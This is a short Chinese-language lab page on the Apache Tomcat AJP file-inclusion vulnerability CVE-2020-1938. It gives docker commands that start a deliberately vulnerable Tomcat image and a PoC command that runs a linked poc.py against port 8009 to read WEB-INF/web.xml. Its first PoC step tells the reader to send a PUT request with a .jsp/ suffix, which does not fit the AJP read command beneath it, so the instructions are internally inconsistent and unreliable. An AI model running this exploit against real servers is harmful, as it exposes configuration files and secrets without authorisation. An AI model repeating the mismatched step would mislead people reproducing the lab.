Tomcat Apache Tomcat 文件包含漏洞(CVE-2020-1938)

漏洞信息

获取环境:

  1. 拉取镜像到本地

    $ docker pull medicean/vulapps:t_tomcat_2
  2. 启动环境

    $ docker run -d -p 8080:8080 medicean/vulapps:t_tomcat_2

    -p 8080:8080 前面的 8080 代表物理机的端口,可随意指定。

使用与利用

访问 http://你的 IP 地址:端口号/

PoC

  1. 向目标发起 PUT 请求,注意后缀为 .jsp/
python poc.py 127.0.0.1 -p 8009 -f WEB-INF/web.xml

POC来源:https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi

参考链接

Copied From: Medicean/VulApps/t/tomcat/2